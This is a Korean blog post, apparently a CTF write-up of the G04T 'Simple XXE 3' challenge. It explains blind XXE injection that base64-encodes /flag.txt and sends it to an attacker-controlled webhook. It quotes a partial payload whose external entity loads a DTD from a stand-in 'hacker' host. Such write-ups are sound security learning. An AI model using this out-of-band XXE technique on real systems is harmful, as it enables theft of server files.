ssongk
ssongk
ssongk
전체 방문자
오늘
어제

공지사항

  • resources
  • 분류 전체보기 (626)
    • CTF (24)
    • background (79)
      • fuzzing (5)
      • linux (29)
      • linux kernel (15)
      • windows (2)
      • web assembly (1)
      • embedded (0)
      • web (13)
      • crypto (9)
      • mobile (1)
      • AI (1)
      • etc.. (3)
    • write-up(pwn) (171)
      • dreamhack (102)
      • pwn.college (4)
      • pwnable.xyz (51)
      • pwnable.tw (3)
      • pwnable.kr (5)
      • G04T (6)
    • write-up(rev) (32)
      • dreamhack (24)
      • reversing.kr (8)
    • write-up(web) (195)
      • dreamhack (63)
      • LOS (40)
      • webhacking.kr (69)
      • websec.fr (3)
      • wargame.kr (6)
      • webgoat (1)
      • G04T (7)
      • suninatas (6)
    • write-up(crypto) (19)
      • dreamhack (16)
      • G04T (1)
      • suninatas (2)
    • write-up(forensic) (53)
      • dreamhack (5)
      • ctf-d (47)
      • suninatas (1)
    • write-up(misc) (13)
      • dreamhack (12)
      • suninatas (1)
    • development (31)
      • Linux (14)
      • Java (13)
      • Python (1)
      • C (2)
      • TroubleShooting (1)
    • 자격증 (8)
    • 이산수학 (1)
    • 정보보안 (0)
hELLO · Designed By 정상우.
ssongk

ssongk

[G04T] Simple XXE 3
write-up(web)/G04T

[G04T] Simple XXE 3

2022. 9. 2. 14:33

문제 화면입니다.

힌트를 보니 플래그는 /flag.txt에 있습니다.

1번 문제처럼 시도해보니 success 라고만 나오고 결과를 주지 않습니다.

이렇게 결과가 나오지 않을 때 blind xxe injection을 활용할 수 있습니다.

https://ngaa.tistory.com/24

 

Blind XXE

Payload <!DOCTYPE nga [ <!ENTITY % read SYSTEM "php://filter/convert.base64-encode/resource=somethings">   <!ENTITY % dtd SYSTEM "https://hacker/xxe.dtd">   %dtd; ]> &request; hacker dtd fi..

ngaa.tistory.com

(base64로 인코딩해주지 않으면 값이 나오지 않습니다)

content type을 text/xml로 바꿔주고

response body에 그림과 같이 넣어줍니다.

payload는 위 그림과 같이 작성해주면 됩니다.

먼저 file 엔티티에 플래그가 저장됩니다.

다음으로 dtd에 공격자의 webhook의 url을 저장하고 실행합니다. -> 웹훅의 첫 번째 리퀘스트에 저장

data 태그에서 send를 호출하면 웹훅의 response body에 저장된 send가 실행된다.

send에 저장되는 url 중 %file;이 플래그 값으로 바뀌면서 요청된다. -> 웹훅의 두 번째 리퀘스트에 저장

첫 번째 리퀘스트는 페이로드로 전달한 dtd파일입니다.

두 번째 리퀘스트는 웹훅 URL을 바꿔줘서 지정한 파라미터에 플래그가 같이 나옵니다.

이 값을 base64 디코딩 해주면

플래그가 나왔습니다~

'write-up(web) > G04T' 카테고리의 다른 글

[G04T] Simple XSS 1  (0) 2022.09.10
[G04T] Simple SSRF 2  (0) 2022.09.08
[G04T] Simple SSRF 1  (0) 2022.09.07
[G04T] Simple XXE 2  (0) 2022.09.01
[G04T] Simple XXE 1  (0) 2022.09.01
    'write-up(web)/G04T' 카테고리의 다른 글
    • [G04T] Simple SSRF 2
    • [G04T] Simple SSRF 1
    • [G04T] Simple XXE 2
    • [G04T] Simple XXE 1
    ssongk
    ssongk
    벌레 사냥꾼이 되고 싶어요

    티스토리툴바